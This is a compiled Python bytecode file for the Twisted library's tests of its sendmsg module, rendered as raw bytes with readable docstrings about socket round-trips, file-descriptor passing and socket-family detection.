Current File : /lib/python3/dist-packages/twisted/python/test/__pycache__/test_sendmsg.cpython-310.pyc
o

�b"(�@s�dZddlZddlZddlZddlZddlmZmZmZmZddl	m
Z
mZmZm
Z
m	Z	ddlmZz
ddl	mZmZWneyGdZYnwdZdd	lmZdd
lmZddlmZmZddlmZdd
lmZddlm Z ddl!m"Z"ddl#m$Z$e"�%�r�ddl	m&Z&dZ'ndZ'zddl(m)Z)m*Z*m+Z+m,Z,Wn
ey�dZ-dZ.YnwdZ-dZ.Gdd�d�Z/dd�Z0Gdd�de1�Z2Gdd�de�Z3dd�Z4ee-e.�Gdd �d e$��Z5ee-e.�Gd!d"�d"e$��Z6dS)#z&
Tests for L{twisted.python.sendmsg}.
�N)�close�pathsep�pipe�read)�AF_INET�AF_INET6�
SOL_SOCKET�error�socket)�pack)�AF_UNIX�
socketpairTF)�skipIf)�reactor)�Deferred�inlineCallbacks)�ProcessDone)�ProcessProtocol)�FilePath)�platform)�TestCase)�MSG_DONTWAIT)�
SCM_RIGHTS�getSocketFamily�recvmsg�sendmsgz!Platform doesn't support sendmsg.�c@s@eZdZdZdd�Zdd�Zdd�Zdd	�Zd
d�Zdd
�Z	dS)�	_FDHolderzP
    A wrapper around a FD that will remember if it has been closed or not.
    cCs
||_dS�N��_fd)�self�fd�r#�B/usr/lib/python3/dist-packages/twisted/python/test/test_sendmsg.py�__init__:s
z_FDHolder.__init__cCs|jS)z/
        Return the fileno of this FD.
        r�r!r#r#r$�fileno=sz_FDHolder.filenocCs|jr
t|j�d|_dSdS)zH
        Close the FD. If it's already been closed, do nothing.
        N)r rr&r#r#r$rCs

�z_FDHolder.closecCs,|jrt�d|j�d�t�|��dSdS)z>
        If C{self._fd} is unclosed, raise a warning.
        zFD z was not closed!N)r �warnings�warn�ResourceWarningrr&r#r#r$�__del__Ks�z_FDHolder.__del__cCs|Srr#r&r#r#r$�	__enter__Ssz_FDHolder.__enter__cCs|��dSr)r)r!�exc_type�	exc_value�	tracebackr#r#r$�__exit__Vsz_FDHolder.__exit__N)
�__name__�
__module__�__qualname__�__doc__r%r'rr+r,r0r#r#r#r$r5srcCst�\}}t|�t|�fS)zI
    Create a pipe, and return the two FDs wrapped in L{_FDHolders}.
    )rr)�r�wr#r#r$�	_makePipeZs
r7c@seZdZdZdefdd�ZdS)�ExitedWithStderrz,
    A process exited with some stderr.
    �returncCsd�dgt|j��}t|�S)zY
        Dump the errors in a pretty way in the event of a subprocess traceback.
        �
�)�join�list�args�repr�r!�resultr#r#r$�__str__gszExitedWithStderr.__str__N)r1r2r3r4�strrBr#r#r#r$r8bsr8c@s8eZdZdZdd�Zdd�Zdd�Zdd	�Zd
d�ZdS)
�StartStopProcessProtocola�
    An L{IProcessProtocol} with a Deferred for events where the subprocess
    starts and stops.

    @ivar started: A L{Deferred} which fires with this protocol's
        L{IProcessTransport} provider when it is connected to one.

    @ivar stopped: A L{Deferred} which fires with the process output or a
        failure if the process produces output on standard error.

    @ivar output: A C{str} used to accumulate standard output.

    @ivar errors: A C{str} used to accumulate standard error.
    cCs t�|_t�|_d|_d|_dS)Nr;)r�started�stopped�output�errorsr&r#r#r$r%s
z!StartStopProcessProtocol.__init__cCs|j�|j�dSr)rE�callback�	transportr&r#r#r$�connectionMade��z'StartStopProcessProtocol.connectionMadecC�|j|7_dSr)rG�r!�datar#r#r$�outReceived�rLz$StartStopProcessProtocol.outReceivedcCrMr)rHrNr#r#r$�errReceived�rLz$StartStopProcessProtocol.errReceivedcCs6|�t�r|j�|j�dS|j�t|j|j��dSr)�checkrrFrIrG�errbackr8rH)r!�reasonr#r#r$�processEnded�s
z%StartStopProcessProtocol.processEndedN)	r1r2r3r4r%rKrPrQrUr#r#r#r$rDosrDc
Cs�ttj���j}ttj�}tt�	tj����j|d<t
�}tj|||tt
��|d���jd|fg|dddddd||id	�|S)
z�
    Start a script that is a peer of this test as a subprocess.

    @param script: the module name of the script in this directory (no
        package prefix, no '.py')
    @type script: C{str}

    @rtype: L{StartStopProcessProtocol}
    �
PYTHONPATHz.pys%drr6�r5�)�env�childFDs)r�sys�
executable�
asTextMode�path�dict�os�environrr<rDr�spawnProcess�__file__�sibling)�script�outputFD�pyExerY�ssppr#r#r$�_spawn�s

��ric@sfeZdZdZdd�Zdd�Zdd�Zdd	�Zd
d�Zdd
�Z	dd�Z
eed�dd��Z
edd��ZdS)�SendmsgTestszB
    Tests for the Python2/3 compatible L{sendmsg} interface.
    cCstt�\|_|_dS)z0
        Create a pair of UNIX sockets.
        N)r
r�inputrGr&r#r#r$�setUp�szSendmsgTests.setUpcCs|j��|j��dS)z4
        Close the sockets opened by setUp.
        N)rkrrGr&r#r#r$�tearDown�s
zSendmsgTests.tearDowncCs4|j��|�tt|jd�}|�|jdtj�dS)z�
        If the underlying C{sendmsg} call fails, L{send1msg} raises
        L{socket.error} with its errno set to the underlying errno value.
        �hello, worldrN�	rkr�assertRaisesr	r�assertEqualr>�errno�EBADF�r!�excr#r#r$�test_syscallError�s
zSendmsgTests.test_syscallErrorcCs:|j��|�tt|jddgd�}|�|jdtj�dS)z�
        The behavior when the underlying C{sendmsg} call fails is the same
        whether L{sendmsg} is passed ancillary data or not.
        rn)rrs0123rNrortr#r#r$�#test_syscallErrorWithControlMessage�s

�z0SendmsgTests.test_syscallErrorWithControlMessagecCsTd}|�t|�t|j|��t|j�}|�|jd�|�|jd�|�|jg�dS)zI
        L{recvmsg} will retrieve a message sent via L{sendmsg}.
        �
hello, world!rN)	rq�lenrrkrrGrO�flags�	ancillary)r!�messagerAr#r#r$�test_roundtrip�s
zSendmsgTests.test_roundtripcCs^ddd}|j�d�t|j|�}|�|t|�k�t|jt|��}|�t|d�|�dS)zS
        L{sendmsg} returns the number of bytes which it was able to send.
        �xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx��FrN)rk�setblockingr�
assertTrueryrrGrq)r!r|�sent�receivedr#r#r$�test_shortsend�szSendmsgTests.test_shortsendcCs0t|jdgd�t|j�}|�|dgdf�dS)z�
        L{sendmsg} treats an empty ancillary data list the same way it treats
        receiving no argument for the ancillary parameter at all.
        rxrN)rrkrrGrqr@r#r#r$�test_roundtripEmptyAncillary�s
z)SendmsgTests.test_roundtripEmptyAncillaryz7MSG_DONTWAIT is only known to work as intended on LinuxcCsltd�D]*}z
t|jdtd�Wqty.}z|�|jdtj�WYd}~dSd}~ww|�	d�dS)z�
        The C{flags} argument to L{sendmsg} is passed on to the underlying
        C{sendmsg} call, to affect it in whatever way is defined by those
        flags.
        i r~)rzrNzHFailed to fill up the send buffer, or maybe send1msg blocked for a while)
�rangerrkr�OSErrorrqr>rr�EAGAIN�fail)r!�i�er#r#r$�
test_flags�s
���zSendmsgTests.test_flagsc
cs��td|j���}|jVt�\}}|�|j�|�|j�|�t|jdt	t
td|���fg�Wd�n1s;wY|jV|�
t|��d�d�|�
t|��d�d�dS)z�
        Calling L{sendmsg} with SOL_SOCKET, SCM_RIGHTS, and a platform-endian
        packed file descriptor number should send that file descriptor to a
        different process, where it can be retrieved by using L{recv1msg}.
        �pullpipesblonkr�NrsTest fixture data: blonk.
r;)rirGr'rEr7�
addCleanuprrrkrrrrFrqr)r!rh�pipeOut�pipeInr#r#r$�test_sendSubProcessFDs �
��z"SendmsgTests.test_sendSubProcessFDN)r1r2r3r4rlrmrvrwr}r�r�r�dontWaitSkipr�rr�r#r#r#r$rj�s	

rjc@s:eZdZdZdd�Zdd�Zdd�Zeed�d	d
��Z	dS)�GetSocketFamilyTestsz'
    Tests for L{getSocketFamily}.
    cCst|�}|�|j�|S)z�
        Create a new socket using the given address family and return that
        socket's file descriptor.  The socket will automatically be closed when
        the test is torn down.
        )r
r�r)r!�
addressFamily�sr#r#r$�_socket3szGetSocketFamilyTests._socketcC�|�tt|�t���dS)z�
        When passed the file descriptor of a socket created with the C{AF_INET}
        address family, L{getSocketFamily} returns C{AF_INET}.
        N)rqrrr�r&r#r#r$�	test_inet=�zGetSocketFamilyTests.test_inetcCr�)z�
        When passed the file descriptor of a socket created with the
        C{AF_INET6} address family, L{getSocketFamily} returns C{AF_INET6}.
        N)rqrrr�r&r#r#r$�
test_inet6Dr�zGetSocketFamilyTests.test_inet6z)Platform does not support AF_UNIX socketscCr�)z�
        When passed the file descriptor of a socket created with the C{AF_UNIX}
        address family, L{getSocketFamily} returns C{AF_UNIX}.
        N)rqrrr�r&r#r#r$�	test_unixKszGetSocketFamilyTests.test_unixN)
r1r2r3r4r�r�r�r�nonUNIXSkipr�r#r#r#r$r�-s
r�)7r4rrr`r[r(rrrrr
rrrr	�structrrr
�ImportErrorr��unittestr�twisted.internetr�twisted.internet.deferrr�twisted.internet.errorr�twisted.internet.protocolr�twisted.python.filepathr�twisted.python.runtimer�twisted.trial.unittestr�isLinuxrr��twisted.python.sendmsgrrrr�doImportSkip�importSkipReasonrr7�	Exceptionr8rDrirjr�r#r#r#r$�<module>sV��%
&{
